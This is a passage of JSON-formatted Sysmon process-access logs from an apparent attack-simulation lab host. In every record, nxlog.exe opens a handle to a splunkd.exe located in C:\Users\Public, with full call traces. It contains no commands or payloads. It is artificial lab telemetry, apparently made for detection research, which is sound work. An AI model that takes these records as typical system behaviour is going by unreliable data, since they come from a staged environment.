{E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:11.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7252,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:12.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:12.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7253,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:13.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:13.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7254,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:14.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:14.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7255,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:15.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:15.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7256,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:16.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:16.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7257,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:17.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:17.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files 